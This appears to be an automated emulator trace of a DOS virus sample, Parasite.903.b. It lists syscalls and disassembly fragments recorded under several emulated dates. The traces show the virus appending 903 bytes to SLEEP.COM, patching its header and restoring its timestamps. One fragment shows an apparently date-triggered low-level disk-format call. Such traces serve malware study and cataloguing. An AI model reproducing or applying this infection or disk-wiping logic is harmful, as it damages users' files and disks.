Sample viewer

vx.netlux.org/Virus.DOS.Parasite.903.b

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T23:10:58.038234924Z	47	PC: 12a79 \| Get disk transfer address
2018-12-17T23:10:58.040219758Z	26	PC: 12a5e \| Set disk transfer address
2018-12-17T23:10:58.04269806Z	42	PC: 12a88 \| Get date 0x12a88: cmp al, 1 0x12a8a: jge 0x12a8f 0x12a8c: jmp 0x12ada 0x12a8e: nop 0x12a8f: cmp al, 1 0x12a91: ja 0x12ada 0x12a93: jmp 0x12a96 0x12a95: nop 0x12a96: mov dl, 2 0x12a98: mov ah, 5 0x12a9a: mov dh, 0 0x12a9c: mov ch, 0 0x12a9e: int 0x13 0x12aa0: mov cx, 0x14 0x12aa3: push cx 0x12aa4: call 0x12ab1 0x12aa7: mov cx, 0x4000 0x12aaa: loop 0x12aaa 0x12aac: pop cx 0x12aad: loop 0x12aa3

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":17026,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:54:39.514278027Z	47	PC: 12a79 \| Get disk transfer address
2018-12-25T12:54:39.517142568Z	26	PC: 12a5e \| Set disk transfer address
2018-12-25T12:54:39.518632383Z	42	PC: 12a88 \| Get date 0x12a88: cmp al, 1 0x12a8a: jge 0x12a8f 0x12a8c: jmp 0x12ada 0x12a8e: nop 0x12a8f: cmp al, 1 0x12a91: ja 0x12ada 0x12a93: jmp 0x12a96 0x12a95: nop 0x12a96: mov dl, 2 0x12a98: mov ah, 5 0x12a9a: mov dh, 0 0x12a9c: mov ch, 0 0x12a9e: int 0x13 0x12aa0: mov cx, 0x14 0x12aa3: push cx 0x12aa4: call 0x12ab1 0x12aa7: mov cx, 0x4000 0x12aaa: loop 0x12aaa 0x12aac: pop cx 0x12aad: loop 0x12aa3
2018-12-25T12:54:39.521707828Z	44	PC: 12ade \| Get time 0x12ade: and dh, 0xf 0x12ae1: cmp dh, 3 0x12ae4: jb 0x12aa0 0x12ae6: cmp dh, 3 0x12ae9: ja 0x12b15 0x12aeb: int 0x19 0x12aed: mov ah, 0x47 0x12aef: xor dl, dl 0x12af1: add si, 0 0x12af5: int 0x21 0x12af7: jb 0x12b15 0x12af9: mov ah, 0x3b 0x12afb: mov dx, si 0x12afd: add dx, 0x40 0x12b01: int 0x21 0x12b03: mov word ptr [bx + 0x44], di 0x12b07: mov si, bx 0x12b09: add si, 0x36 0x12b0d: mov cx, 6 0x12b10: rep movsb byte ptr es:[di], byte ptr [si]
2018-12-25T12:54:39.528731972Z	78	PC: 12b99 \| Find first file
2018-12-25T12:54:39.538422187Z	67	PC: 12bda \| Get or set file attributes
2018-12-25T12:54:39.544621783Z	67	PC: 12bec \| Get or set file attributes
2018-12-25T12:54:39.675777464Z	61	PC: 12bf7 \| Open file (Filename = 'SLEEP.COM')
2018-12-25T12:54:39.692475742Z	87	PC: 12c03 \| Get or set file date and time
2018-12-25T12:54:39.694098351Z	44	PC: 12c0f \| Get time 0x12c0f: and dh, 7 0x12c12: jmp 0x12c15 0x12c14: nop 0x12c15: mov ah, 0x3f 0x12c17: mov cx, 3 0x12c1a: mov dx, 0x2a 0x12c1d: nop 0x12c1e: add dx, si 0x12c20: int 0x21 0x12c22: jb 0x12c7f 0x12c24: cmp ax, 3 0x12c27: jne 0x12c7f 0x12c29: mov ax, 0x4202 0x12c2c: mov cx, 0 0x12c2f: mov dx, 0 0x12c32: int 0x21 0x12c34: jb 0x12c7f 0x12c36: mov cx, ax 0x12c38: sub ax, 3 0x12c3b: mov word ptr [si + 0x2e], ax
2018-12-25T12:54:39.696832961Z	63	PC: 12c22 \| Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:54:39.707437743Z	66	PC: 12c34 \| Move file pointer
2018-12-25T12:54:39.708679059Z	64	PC: 12c5e \| Write file or device (Write 903 bytes on handle 5)
2018-12-25T12:54:39.718617353Z	66	PC: 12c70 \| Move file pointer
2018-12-25T12:54:39.721386085Z	64	PC: 12c7f \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:54:39.730019414Z	87	PC: 12c92 \| Get or set file date and time
2018-12-25T12:54:39.73203833Z	62	PC: 12c96 \| Close file
2018-12-25T12:54:39.741041077Z	67	PC: 12ca5 \| Get or set file attributes
2018-12-25T12:54:39.753271208Z	26	PC: 12cb2 \| Set disk transfer address

{"DateBased":true,"Day":6,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":17026,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:54:39.617423842Z	47	PC: 12a79 \| Get disk transfer address
2018-12-25T12:54:39.619116266Z	26	PC: 12a5e \| Set disk transfer address
2018-12-25T12:54:39.620264843Z	42	PC: 12a88 \| Get date 0x12a88: cmp al, 1 0x12a8a: jge 0x12a8f 0x12a8c: jmp 0x12ada 0x12a8e: nop 0x12a8f: cmp al, 1 0x12a91: ja 0x12ada 0x12a93: jmp 0x12a96 0x12a95: nop 0x12a96: mov dl, 2 0x12a98: mov ah, 5 0x12a9a: mov dh, 0 0x12a9c: mov ch, 0 0x12a9e: int 0x13 0x12aa0: mov cx, 0x14 0x12aa3: push cx 0x12aa4: call 0x12ab1 0x12aa7: mov cx, 0x4000 0x12aaa: loop 0x12aaa 0x12aac: pop cx 0x12aad: loop 0x12aa3
2018-12-25T12:54:39.626527156Z	44	PC: 12ade \| Get time 0x12ade: and dh, 0xf 0x12ae1: cmp dh, 3 0x12ae4: jb 0x12aa0 0x12ae6: cmp dh, 3 0x12ae9: ja 0x12b15 0x12aeb: int 0x19 0x12aed: mov ah, 0x47 0x12aef: xor dl, dl 0x12af1: add si, 0 0x12af5: int 0x21 0x12af7: jb 0x12b15 0x12af9: mov ah, 0x3b 0x12afb: mov dx, si 0x12afd: add dx, 0x40 0x12b01: int 0x21 0x12b03: mov word ptr [bx + 0x44], di 0x12b07: mov si, bx 0x12b09: add si, 0x36 0x12b0d: mov cx, 6 0x12b10: rep movsb byte ptr es:[di], byte ptr [si]
2018-12-25T12:54:39.629216991Z	78	PC: 12b99 \| Find first file
2018-12-25T12:54:39.634108841Z	67	PC: 12bda \| Get or set file attributes
2018-12-25T12:54:39.637787824Z	67	PC: 12bec \| Get or set file attributes
2018-12-25T12:54:39.676045612Z	61	PC: 12bf7 \| Open file (Filename = 'SLEEP.COM')
2018-12-25T12:54:39.683995722Z	87	PC: 12c03 \| Get or set file date and time
2018-12-25T12:54:39.686002299Z	44	PC: 12c0f \| Get time 0x12c0f: and dh, 7 0x12c12: jmp 0x12c15 0x12c14: nop 0x12c15: mov ah, 0x3f 0x12c17: mov cx, 3 0x12c1a: mov dx, 0x2a 0x12c1d: nop 0x12c1e: add dx, si 0x12c20: int 0x21 0x12c22: jb 0x12c7f 0x12c24: cmp ax, 3 0x12c27: jne 0x12c7f 0x12c29: mov ax, 0x4202 0x12c2c: mov cx, 0 0x12c2f: mov dx, 0 0x12c32: int 0x21 0x12c34: jb 0x12c7f 0x12c36: mov cx, ax 0x12c38: sub ax, 3 0x12c3b: mov word ptr [si + 0x2e], ax
2018-12-25T12:54:39.688742675Z	63	PC: 12c22 \| Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:54:39.696068223Z	66	PC: 12c34 \| Move file pointer
2018-12-25T12:54:39.698151826Z	64	PC: 12c5e \| Write file or device (Write 903 bytes on handle 5)
2018-12-25T12:54:39.709142184Z	66	PC: 12c70 \| Move file pointer
2018-12-25T12:54:39.714705374Z	64	PC: 12c7f \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:54:39.724225165Z	87	PC: 12c92 \| Get or set file date and time
2018-12-25T12:54:39.725996286Z	62	PC: 12c96 \| Close file
2018-12-25T12:54:39.735820922Z	67	PC: 12ca5 \| Get or set file attributes
2018-12-25T12:54:39.761121532Z	26	PC: 12cb2 \| Set disk transfer address

{"DateBased":true,"Day":7,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":17026,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:54:39.740960824Z	47	PC: 12a79 \| Get disk transfer address
2018-12-25T12:54:39.743636573Z	26	PC: 12a5e \| Set disk transfer address
2018-12-25T12:54:39.744814035Z	42	PC: 12a88 \| Get date 0x12a88: cmp al, 1 0x12a8a: jge 0x12a8f 0x12a8c: jmp 0x12ada 0x12a8e: nop 0x12a8f: cmp al, 1 0x12a91: ja 0x12ada 0x12a93: jmp 0x12a96 0x12a95: nop 0x12a96: mov dl, 2 0x12a98: mov ah, 5 0x12a9a: mov dh, 0 0x12a9c: mov ch, 0 0x12a9e: int 0x13 0x12aa0: mov cx, 0x14 0x12aa3: push cx 0x12aa4: call 0x12ab1 0x12aa7: mov cx, 0x4000 0x12aaa: loop 0x12aaa 0x12aac: pop cx 0x12aad: loop 0x12aa3